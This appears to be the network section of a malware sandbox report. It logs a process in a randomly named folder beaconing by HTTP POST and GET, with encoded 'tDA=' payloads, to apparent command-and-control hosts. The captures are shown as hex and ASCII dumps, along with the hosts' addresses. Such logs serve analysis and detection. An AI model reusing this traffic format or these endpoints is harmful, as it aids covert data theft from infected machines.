                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 68 70 72 6c 7a 2e 63 7a 2f 77 36 71 67 2f 3f 59 32 41 68 52 3d 66 44 4e 64 5a 50 48 48 31 68 73 70 38 72 72 70 26 61 6d 70 3b 74 44 41 3d 30 6c 70 54 52 51 63 44 55 48 2b 69 45 73 47 79 62 37 4b 39 33 6a 4a 33 41 6b 63 68 42 63 32 65 37 5a 2f 78 75 4e 6d 54 67 64 6c 69 39 72 70 4f 55 47 79 58 69 7a 6a 35 63 51 39 58 78 43 34 73 6f 38 34 46 4e 70 46 52 39 74 78 58 78 6d 30 74 71 31 43 61 79 68 4a 2b 4e 49 6b 43 44 4c 39 2f 38 50 35 33 71 36 7a [TRUNCATED]
                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://www.hprlz.cz/w6qg/?Y2AhR=fDNdZPHH1hsp8rrp&amp;tDA=0lpTRQcDUH+iEsGyb7K93jJ3AkchBc2e7Z/xuNmTgdli9rpOUGyXizj5cQ9XxC4so84FNpFR9txXxm0tq1CayhJ+NIkCDL9/8P53q6zBNKDHtjSuHiPb7bo=">here</a>.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 49737 | 217.160.0.106 | 80 | 4484 | C:\Program Files (x86)\gYQlsSLqVUVBabBypBixFycKmMRXnXCfFeOBwuco\qsWkdNJOHuxNQUCXoUm.exe
Timestamp | Bytes transferred | Direction | Data
Jul 13, 2024 00:07:46.120126963 CEST | 791 | OUT | POST /qe66/ HTTP/1.1
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                  Accept-Language: en-us
                                  Accept-Encoding: gzip, deflate, br
                                  Host: www.catherineviskadi.com
                                  Origin: http://www.catherineviskadi.com
                                  Cache-Control: max-age=0
                                  Connection: close
                                  Content-Type: application/x-www-form-urlencoded
                                  Content-Length: 200
                                  Referer: http://www.catherineviskadi.com/qe66/
                                  User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                                  Data Raw: 74 44 41 3d 51 6c 48 72 66 70 53 50 44 67 78 66 5a 61 63 2b 51 6c 4e 41 73 53 42 46 62 6e 77 79 33 61 2b 72 64 6c 56 6d 4d 4e 6b 2b 49 4c 37 5a 59 72 47 4d 46 70 61 4c 66 35 6f 76 69 35 4c 39 78 6f 56 57 4f 43 42 46 78 67 58 30 61 6d 6f 4f 34 53 4c 4e 42 54 7a 6f 6f 67 61 42 6a 62 71 48 52 2b 64 78 37 67 4a 62 61 31 71 68 6a 75 57 6d 54 6f 68 6f 6b 54 4f 4e 33 6a 7a 34 4d 74 44 52 37 4b 31 73 77 67 44 6b 79 37 66 4c 71 67 65 56 52 48 69 38 6a 47 37 78 31 79 48 35 32 6f 75 51 55 4c 6e 52 37 55 78 6c 46 66 58 56 4f 54 51 50 44 66 58 7a 61 2b 36 4f 5a 53 54 41 44 36 6b 79 56 41 65 71 65 51 3d 3d
                                  Data Ascii: tDA=QlHrfpSPDgxfZac+QlNAsSBFbnwy3a+rdlVmMNk+IL7ZYrGMFpaLf5ovi5L9xoVWOCBFxgX0amoO4SLNBTzoogaBjbqHR+dx7gJba1qhjuWmTohokTON3jz4MtDR7K1swgDky7fLqgeVRHi8jG7x1yH52ouQULnR7UxlFfXVOTQPDfXza+6OZSTAD6kyVAeqeQ==
                                  Jul 13, 2024 00:07:46.762787104 CEST | 580 | IN | HTTP/1.1 404 Not Found
                                  Content-Type: text/html
                                  Transfer-Encoding: chunked
                                  Connection: close
                                  Date: Fri, 12 Jul 2024 22:07:46 GMT
                                  Server: Apache
                                  Content-Encoding: gzip
                                  Data Raw: 31 38 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 51 4b 4f e3 30 10 be f7 57 cc 7a 0f 9c 1c 37 94 43 9b 26 1c b6 ad b4 48 85 45 28 88 e5 68 62 b7 b1 e4 78 82 33 21 0d bf 1e 27 e5 b1 20 b4 27 8f ed ef 31 f3 4d fa 63 fd 67 95 df 5f 6f a0 a4 ca c2 f5 ed af ed c5 0a 18 17 e2 6e b6 12 62 9d af e1 ef ef fc 72 0b 71 34 85 dc 4b d7 18 32 e8 a4 15 62 73 c5 26 ac 24 aa 13 21 ba ae 8b ba 59 84 7e 2f f2 1b 71 18 b4 e2 81 fc 5a 72 fa 87 19 29 52 ec 7c 92 8e 86 56 ba 7d c6 b4 63 70 a8 6c f2 e9 e6 9a ec 1b f9 78 b1 58 1c 55 83 06 a4 a5 96 2a 9c 90 92 21 ab 87 0a 36 de a3 87 b3 e9 19 70 b8 42 82 1d b6 4e 0d 10 f1 8e 49 2b 4d 12 0a 74 a4 1d 65 8c f4 81 c4 d0 ce 12 8a 52 fa 46 53 d6 d2 8e cf 59 08 85 6a ae 1f 5b f3 94 b1 d5 11 ce f3 be d6 83 37 7c 51 71 c8 0b 59 94 fa 33 6b 7c e2 83 95 47 3b b6 2c 5e 7b 4e 1f 50 f5 d0 50 6f 75 c6 76 01 c0 77 b2 32 b6 4f a4 37 d2 2e 8f 16 65 fc 86 28 d0 a2 4f 7e 4e e5 ec 74 5e 2c 47 7c 63 9e 75 12 16 a3 ab 23 fa 3f a3 97 f1 d8 71 fd a6 f6 c1 9f 46 f3 77 fe 3d b6 1e 1e 3c 76 8d f6 50 48 [TRUNCATED]
                                  Data Ascii: 189}QKO0Wz7C&HE(hbx3!' '1Mcg_onbrq4K2bs&$!Y~/qZr)R|V}cplxXU*!6pBNI+MteRFSYj[7|QqY3k|G;,^{NPPouvw2O7.e(O~Nt^,G|cu#?qFw=<vPHw3Nmy2nzlB8`a1l`mur0


                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                  2 | 192.168.2.4 | 49738 | 217.160.0.106 | 80 | 4484 | C:\Program Files (x86)\gYQlsSLqVUVBabBypBixFycKmMRXnXCfFeOBwuco\qsWkdNJOHuxNQUCXoUm.exe
                                  Timestamp | Bytes transferred | Direction | Data
                                  Jul 13, 2024 00:07:48.656337023 CEST | 811 | OUT | POST /qe66/ HTTP/1.1
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                  Accept-Language: en-us
                                  Accept-Encoding: gzip, deflate, br
                                  Host: www.catherineviskadi.com
                                  Origin: http://www.catherineviskadi.com
                                  Cache-Control: max-age=0
                                  Connection: close
                                  Content-Type: application/x-www-form-urlencoded
                                  Content-Length: 220
                                  Referer: http://www.catherineviskadi.com/qe66/
                                  User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                                  Data Raw: 74 44 41 3d 51 6c 48 72 66 70 53 50 44 67 78 66 44 2f 55 2b 54 47 6c 41 35 43 42 43 48 33 77 79 2b 36 2b 56 64 6c 5a 6d 4d 4d 67 75 4c 34 66 5a 59 4c 32 4d 45 6f 61 4c 63 35 6f 76 70 5a 4c 38 31 6f 56 6e 4f 43 4e 72 78 69 44 30 61 6d 73 4f 34 54 37 4e 42 45 6e 72 72 51 61 44 6f 37 71 46 4d 75 64 78 37 67 4a 62 61 31 75 50 6a 76 2b 6d 51 59 52 6f 6c 79 4f 43 72 54 7a 2f 45 4e 44 52 32 71 31 6f 77 67 44 4b 79 2b 47 75 71 6d 43 56 52 48 53 38 67 54 58 79 38 79 48 37 35 49 76 45 46 71 4b 42 69 46 30 6c 4b 50 44 5a 41 54 45 7a 4c 35 47 70 4c 50 62 5a 4c 53 33 7a 65 39 74 47 59 44 6a 6a 46 61 58 6c 73 79 65 52 6e 4b 2f 32 4a 59 4e 52 32 45 4b 6a 79 72 51 3d
                                  Data Ascii: tDA=QlHrfpSPDgxfD/U+TGlA5CBCH3wy+6+VdlZmMMguL4fZYL2MEoaLc5ovpZL81oVnOCNrxiD0amsO4T7NBEnrrQaDo7qFMudx7gJba1uPjv+mQYRolyOCrTz/ENDR2q1owgDKy+GuqmCVRHS8gTXy8yH75IvEFqKBiF0lKPDZATEzL5GpLPbZLS3ze9tGYDjjFaXlsyeRnK/2JYNR2EKjyrQ=
                                  Jul 13, 2024 00:07:49.323837996 CEST | 580 | IN | HTTP/1.1 404 Not Found
                                  Content-Type: text/html
                                  Transfer-Encoding: chunked
                                  Connection: close
                                  Date: Fri, 12 Jul 2024 22:07:49 GMT
                                  Server: Apache
                                  Content-Encoding: gzip
                                  Data Raw: 31 38 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 51 4b 4f e3 30 10 be f7 57 cc 7a 0f 9c 1c 37 94 43 9b 26 1c b6 ad b4 48 85 45 28 88 e5 68 62 b7 b1 e4 78 82 33 21 0d bf 1e 27 e5 b1 20 b4 27 8f ed ef 31 f3 4d fa 63 fd 67 95 df 5f 6f a0 a4 ca c2 f5 ed af ed c5 0a 18 17 e2 6e b6 12 62 9d af e1 ef ef fc 72 0b 71 34 85 dc 4b d7 18 32 e8 a4 15 62 73 c5 26 ac 24 aa 13 21 ba ae 8b ba 59 84 7e 2f f2 1b 71 18 b4 e2 81 fc 5a 72 fa 87 19 29 52 ec 7c 92 8e 86 56 ba 7d c6 b4 63 70 a8 6c f2 e9 e6 9a ec 1b f9 78 b1 58 1c 55 83 06 a4 a5 96 2a 9c 90 92 21 ab 87 0a 36 de a3 87 b3 e9 19 70 b8 42 82 1d b6 4e 0d 10 f1 8e 49 2b 4d 12 0a 74 a4 1d 65 8c f4 81 c4 d0 ce 12 8a 52 fa 46 53 d6 d2 8e cf 59 08 85 6a ae 1f 5b f3 94 b1 d5 11 ce f3 be d6 83 37 7c 51 71 c8 0b 59 94 fa 33 6b 7c e2 83 95 47 3b b6 2c 5e 7b 4e 1f 50 f5 d0 50 6f 75 c6 76 01 c0 77 b2 32 b6 4f a4 37 d2 2e 8f 16 65 fc 86 28 d0 a2 4f 7e 4e e5 ec 74 5e 2c 47 7c 63 9e 75 12 16 a3 ab 23 fa 3f a3 97 f1 d8 71 fd a6 f6 c1 9f 46 f3 77 fe 3d b6 1e 1e 3c 76 8d f6 50 48 [TRUNCATED]
                                  Data Ascii: 189}QKO0Wz7C&HE(hbx3!' '1Mcg_onbrq4K2bs&$!Y~/qZr)R|V}cplxXU*!6pBNI+MteRFSYj[7|QqY3k|G;,^{NPPouvw2O7.e(O~Nt^,G|cu#?qFw=<vPHw3Nmy2nzlB8`a1l`mur0


                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                  3 | 192.168.2.4 | 49739 | 217.160.0.106 | 80 | 4484 | C:\Program Files (x86)\gYQlsSLqVUVBabBypBixFycKmMRXnXCfFeOBwuco\qsWkdNJOHuxNQUCXoUm.exe
                                  Timestamp | Bytes transferred | Direction | Data
                                  Jul 13, 2024 00:07:51.185796022 CEST | 10893 | OUT | POST /qe66/ HTTP/1.1
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                  Accept-Language: en-us
                                  Accept-Encoding: gzip, deflate, br
                                  Host: www.catherineviskadi.com
                                  Origin: http://www.catherineviskadi.com
                                  Cache-Control: max-age=0
                                  Connection: close
                                  Content-Type: application/x-www-form-urlencoded
                                  Content-Length: 10300
                                  Referer: http://www.catherineviskadi.com/qe66/
                                  User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                                  Data Raw: 74 44 41 3d 51 6c 48 72 66 70 53 50 44 67 78 66 44 2f 55 2b 54 47 6c 41 35 43 42 43 48 33 77 79 2b 36 2b 56 64 6c 5a 6d 4d 4d 67 75 4c 34 58 5a 59 36 57 4d 45 4c 43 4c 64 35 6f 76 6b 35 4c 68 31 6f 56 41 4f 43 46 76 78 69 50 6b 61 67 77 4f 35 78 7a 4e 52 67 4c 72 38 41 61 44 6e 62 71 49 52 2b 63 7a 37 67 5a 66 61 31 2b 50 6a 76 2b 6d 51 61 4a 6f 6c 6a 4f 43 70 54 7a 34 4d 74 44 4e 37 4b 31 41 77 67 37 38 79 36 62 62 72 51 79 56 53 6e 43 38 77 78 50 79 2b 53 48 44 34 49 76 4d 46 71 48 62 69 42 55 54 4b 50 32 32 41 52 59 7a 50 76 48 41 59 63 66 65 63 78 6d 31 41 66 63 69 63 43 58 69 42 4b 54 67 6f 6a 47 36 31 4f 33 43 54 4b 63 4e 69 46 57 38 70 38 63 4e 69 50 53 38 2f 70 6c 66 55 44 56 69 4a 4a 57 52 4e 65 5a 4a 34 68 2b 43 4d 56 4c 32 47 6b 76 57 62 75 51 57 34 68 7a 72 48 44 4b 50 52 47 7a 71 2b 4e 7a 78 4d 65 59 6d 66 73 64 36 36 49 5a 2b 4a 74 64 42 66 4a 57 7a 7a 72 43 4d 63 32 49 67 6c 49 41 59 44 4c 75 4e 69 4c 69 73 47 39 36 72 77 55 69 4b 31 4f 31 4e 64 72 2b 5a 54 56 65 54 41 6b 70 73 79 38 [TRUNCATED]
                                  Data Ascii: tDA= [TRUNCATED]
                                  Jul 13, 2024 00:07:51.868599892 CEST | 580 | IN | HTTP/1.1 404 Not Found
                                  Content-Type: text/html
                                  Transfer-Encoding: chunked
                                  Connection: close
                                  Date: Fri, 12 Jul 2024 22:07:51 GMT
                                  Server: Apache
                                  Content-Encoding: gzip
                                  Data Raw: 31 38 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 51 4b 4f e3 30 10 be f7 57 cc 7a 0f 9c 1c 37 94 43 9b 26 1c b6 ad b4 48 85 45 28 88 e5 68 62 b7 b1 e4 78 82 33 21 0d bf 1e 27 e5 b1 20 b4 27 8f ed ef 31 f3 4d fa 63 fd 67 95 df 5f 6f a0 a4 ca c2 f5 ed af ed c5 0a 18 17 e2 6e b6 12 62 9d af e1 ef ef fc 72 0b 71 34 85 dc 4b d7 18 32 e8 a4 15 62 73 c5 26 ac 24 aa 13 21 ba ae 8b ba 59 84 7e 2f f2 1b 71 18 b4 e2 81 fc 5a 72 fa 87 19 29 52 ec 7c 92 8e 86 56 ba 7d c6 b4 63 70 a8 6c f2 e9 e6 9a ec 1b f9 78 b1 58 1c 55 83 06 a4 a5 96 2a 9c 90 92 21 ab 87 0a 36 de a3 87 b3 e9 19 70 b8 42 82 1d b6 4e 0d 10 f1 8e 49 2b 4d 12 0a 74 a4 1d 65 8c f4 81 c4 d0 ce 12 8a 52 fa 46 53 d6 d2 8e cf 59 08 85 6a ae 1f 5b f3 94 b1 d5 11 ce f3 be d6 83 37 7c 51 71 c8 0b 59 94 fa 33 6b 7c e2 83 95 47 3b b6 2c 5e 7b 4e 1f 50 f5 d0 50 6f 75 c6 76 01 c0 77 b2 32 b6 4f a4 37 d2 2e 8f 16 65 fc 86 28 d0 a2 4f 7e 4e e5 ec 74 5e 2c 47 7c 63 9e 75 12 16 a3 ab 23 fa 3f a3 97 f1 d8 71 fd a6 f6 c1 9f 46 f3 77 fe 3d b6 1e 1e 3c 76 8d f6 50 48 [TRUNCATED]
                                  Data Ascii: 189}QKO0Wz7C&HE(hbx3!' '1Mcg_onbrq4K2bs&$!Y~/qZr)R|V}cplxXU*!6pBNI+MteRFSYj[7|QqY3k|G;,^{NPPouvw2O7.e(O~Nt^,G|cu#?qFw=<vPHw3Nmy2nzlB8`a1l`mur0


                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                  4 | 192.168.2.4 | 49740 | 217.160.0.106 | 80 | 4484 | C:\Program Files (x86)\gYQlsSLqVUVBabBypBixFycKmMRXnXCfFeOBwuco\qsWkdNJOHuxNQUCXoUm.exe
                                  Timestamp | Bytes transferred | Direction | Data
                                  Jul 13, 2024 00:07:53.722448111 CEST | 517 | OUT | GET /qe66/?tDA=dnvLceXALBk3Hr4+RUpDuj1gE1lZ37++NG0MGchlNc+FfqCdFLzpUNQMmrv30qtrBi93uCjMcFA24SebHgOv/zqChZDwQ/s0nTN9cl2J79+sQIZRijKLgDM=&Y2AhR=fDNdZPHH1hsp8rrp HTTP/1.1
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                  Accept-Language: en-us
                                  Host: www.catherineviskadi.com
                                  Connection: close
                                  User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                                  Jul 13, 2024 00:07:54.387881041 CEST | 770 | IN | HTTP/1.1 404 Not Found
                                  Content-Type: text/html
                                  Content-Length: 626
                                  Connection: close
                                  Date: Fri, 12 Jul 2024 22:07:54 GMT
                                  Server: Apache
                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 0a 20 20 20 45 72 72 6f 72 20 34 30 34 20 2d 20 4e 6f 74 20 66 6f 75 6e 64 0a 20 20 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 [TRUNCATED]
                                  Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Error 404 - Not found </title> <meta content="text/html; charset=utf-8" http-equiv="Content-Type"> <meta content="no-cache" http-equiv="cache-control"> </head> <body style="font-family:arial;"> <h1 style="color:#0a328c;font-size:1.0em;"> Error 404 - Not found </h1> <p style="font-size:0.8em;"> Your browser can't find the document corresponding to the URL you typed in. </p> </body></html>


                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                  5 | 192.168.2.4 | 49742 | 208.91.197.27 | 80 | 4484 | C:\Program Files (x86)\gYQlsSLqVUVBabBypBixFycKmMRXnXCfFeOBwuco\qsWkdNJOHuxNQUCXoUm.exe
                                  Timestamp | Bytes transferred | Direction | Data
                                  Jul 13, 2024 00:08:15.823052883 CEST | 785 | OUT | POST /xzzi/ HTTP/1.1
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                  Accept-Language: en-us
                                  Accept-Encoding: gzip, deflate, br
                                  Host: www.bfiworkerscomp.com
                                  Origin: http://www.bfiworkerscomp.com
                                  Cache-Control: max-age=0
                                  Connection: close
                                  Content-Type: application/x-www-form-urlencoded
                                  Content-Length: 200
                                  Referer: http://www.bfiworkerscomp.com/xzzi/
                                  User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                                  Data Raw: 74 44 41 3d 77 41 37 79 63 45 49 75 2b 6f 76 49 35 39 72 66 31 37 61 31 55 4f 5a 4d 67 47 38 38 71 50 57 30 74 56 59 38 77 6e 46 75 57 76 5a 6f 63 31 2b 36 77 2b 43 4c 4c 58 74 7a 67 2f 31 58 4c 56 69 70 4a 2f 34 48 56 58 2f 4d 67 67 48 48 68 4d 4a 75 6b 52 76 6d 51 4a 70 46 4c 67 5a 72 7a 6b 4f 4a 63 62 68 34 34 76 67 78 64 64 51 30 68 38 52 59 6c 33 68 50 66 30 53 41 58 4a 37 56 50 6b 4c 37 64 30 41 75 61 67 62 77 64 44 57 34 4b 34 53 46 6e 37 54 52 75 6b 74 6b 79 76 53 49 37 38 45 54 44 4c 72 77 45 67 4b 5a 55 48 57 71 63 4e 61 63 4d 38 76 73 75 5a 2b 48 6b 42 51 71 69 61 4d 62 6a 67 3d 3d
                                  Data Ascii: tDA=wA7ycEIu+ovI59rf17a1UOZMgG88qPW0tVY8wnFuWvZoc1+6w+CLLXtzg/1XLVipJ/4HVX/MggHHhMJukRvmQJpFLgZrzkOJcbh44vgxddQ0h8RYl3hPf0SAXJ7VPkL7d0AuagbwdDW4K4SFn7TRuktkyvSI78ETDLrwEgKZUHWqcNacM8vsuZ+HkBQqiaMbjg==


                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                  6 | 192.168.2.4 | 49743 | 208.91.197.27 | 80 | 4484 | C:\Program Files (x86)\gYQlsSLqVUVBabBypBixFycKmMRXnXCfFeOBwuco\qsWkdNJOHuxNQUCXoUm.exe
                                  Timestamp | Bytes transferred | Direction | Data
                                  Jul 13, 2024 00:08:18.355432034 CEST | 805 | OUT | POST /xzzi/ HTTP/1.1
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                  Accept-Language: en-us
                                  Accept-Encoding: gzip, deflate, br
                                  Host: www.bfiworkerscomp.com
                                  Origin: http://www.bfiworkerscomp.com
                                  Cache-Control: max-age=0
                                  Connection: close
                                  Content-Type: application/x-www-form-urlencoded
                                  Content-Length: 220
                                  Referer: http://www.bfiworkerscomp.com/xzzi/
                                  User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                                  Data Raw: 74 44 41 3d 77 41 37 79 63 45 49 75 2b 6f 76 49 37 64 62 66 6d 4d 4f 31 46 65 59 2b 6c 47 38 38 6b 66 57 76 74 56 55 38 77 6d 42 2b 57 35 78 6f 63 55 4f 36 78 2f 43 4c 49 58 74 7a 31 50 31 53 50 56 69 33 4a 2f 38 50 56 53 48 4d 67 67 44 48 68 4a 31 75 6b 41 76 35 52 5a 70 44 44 41 5a 74 33 6b 4f 4a 63 62 68 34 34 76 46 55 64 5a 30 30 68 50 5a 59 33 69 56 4d 57 55 53 44 57 4a 37 56 59 55 4c 2f 64 30 41 51 61 68 33 4b 64 42 75 34 4b 35 69 46 67 75 7a 53 68 6b 74 6d 76 2f 54 47 71 74 74 39 47 2b 4f 42 50 42 71 36 61 46 65 71 51 72 4c 47 64 4e 4f 37 38 5a 61 30 35 47 5a 65 76 5a 78 53 34 76 78 43 4e 4e 47 72 33 70 4b 4e 43 74 54 4b 49 56 45 42 77 76 73 3d
                                  Data Ascii: tDA=wA7ycEIu+ovI7dbfmMO1FeY+lG88kfWvtVU8wmB+W5xocUO6x/CLIXtz1P1SPVi3J/8PVSHMggDHhJ1ukAv5RZpDDAZt3kOJcbh44vFUdZ00hPZY3iVMWUSDWJ7VYUL/d0AQah3KdBu4K5iFguzShktmv/TGqtt9G+OBPBq6aFeqQrLGdNO78Za05GZevZxS4vxCNNGr3pKNCtTKIVEBwvs=


                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                  7 | 192.168.2.4 | 49744 | 208.91.197.27 | 80 | 4484 | C:\Program Files (x86)\gYQlsSLqVUVBabBypBixFycKmMRXnXCfFeOBwuco\qsWkdNJOHuxNQUCXoUm.exe
                                  Timestamp | Bytes transferred | Direction | Data
                                  Jul 13, 2024 00:08:20.893178940 CEST | 10887 | OUT | POST /xzzi/ HTTP/1.1
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                  Accept-Language: en-us
                                  Accept-Encoding: gzip, deflate, br
                                  Host: www.bfiworkerscomp.com
                                  Origin: http://www.bfiworkerscomp.com
                                  Cache-Control: max-age=0
                                  Connection: close
                                  Content-Type: application/x-www-form-urlencoded
                                  Content-Length: 10300
                                  Referer: http://www.bfiworkerscomp.com/xzzi/
                                  User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                                  Data Raw: 74 44 41 3d 77 41 37 79 63 45 49 75 2b 6f 76 49 37 64 62 66 6d 4d 4f 31 46 65 59 2b 6c 47 38 38 6b 66 57 76 74 56 55 38 77 6d 42 2b 57 35 4a 6f 63 6d 71 36 78 63 36 4c 4a 58 74 7a 70 66 31 54 50 56 6a 79 4a 37 51 4c 56 54 36 78 67 69 4c 48 67 72 4e 75 7a 45 7a 35 66 70 70 44 63 51 5a 73 7a 6b 4f 51 63 62 78 30 34 76 31 55 64 5a 30 30 68 4a 39 59 6e 48 68 4d 61 30 53 41 58 4a 37 5a 50 6b 4c 48 64 30 4a 72 61 68 43 39 64 31 61 34 4c 5a 79 46 69 64 62 53 6f 6b 74 67 73 2f 53 62 71 74 78 2b 47 36 76 2b 50 42 65 41 61 48 43 71 54 64 6a 61 48 39 36 50 76 49 71 59 37 32 78 4f 72 4a 34 54 37 38 78 58 4e 63 36 63 69 74 50 75 41 2f 71 68 66 67 55 77 70 36 2f 35 62 34 5a 41 73 69 49 33 61 68 79 32 58 59 43 6c 73 75 59 6f 4c 52 57 38 47 58 6c 66 46 4a 51 69 52 57 39 4a 42 69 71 48 4b 61 6f 4b 36 49 77 39 7a 4b 71 64 6a 72 44 57 31 5a 46 4b 44 54 57 43 7a 4d 71 62 39 6e 64 65 54 6b 62 65 41 51 75 41 45 6c 51 49 6e 44 6a 34 73 45 77 49 37 71 45 71 51 45 6f 2f 34 30 48 74 4c 52 34 63 50 45 43 49 74 6d 46 4a 7a 38 [TRUNCATED]
                                  Data Ascii: tDA= [TRUNCATED]


                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                  8 | 192.168.2.4 | 49745 | 208.91.197.27 | 80 | 4484 | C:\Program Files (x86)\gYQlsSLqVUVBabBypBixFycKmMRXnXCfFeOBwuco\qsWkdNJOHuxNQUCXoUm.exe
                                  Timestamp | Bytes transferred | Direction | Data
                                  Jul 13, 2024 00:08:23.628108978 CEST | 515 | OUT | GET /xzzi/?Y2AhR=fDNdZPHH1hsp8rrp&tDA=9CTSfwlM5YWl8fvbrbSkFth60mtnncbW1FpC9VokAvwkUHOJycf2DDxLp9tWLELwEKEPfCC2oiLqmqE9jQi/S4FmCg8fmWLidol7jMU2H7Flt+5ZogJ/ZG4= HTTP/1.1
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                  Accept-Language: en-us
                                  Host: www.bfiworkerscomp.com
                                  Connection: close
                                  User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                                  Jul 13, 2024 00:08:25.762509108 CEST | 1236 | IN | HTTP/1.1 200 OK
                                  Date: Fri, 12 Jul 2024 22:08:11 GMT
                                  Server: Apache
                                  Set-Cookie: vsid=932vr468367692593632941; expires=Wed, 11-Jul-2029 22:08:12 GMT; Max-Age=157680000; path=/; domain=www.bfiworkerscomp.com; HttpOnly
                                  X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4+L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_GxXnhxAHvJJQQbg+i046xSSYNXToIv/EUGyUz7+5r5WmJ78vAbXibB79PVxPo9cfqAjtXwBJCcQPwkEU+Wr3OA==
                                  Transfer-Encoding: chunked
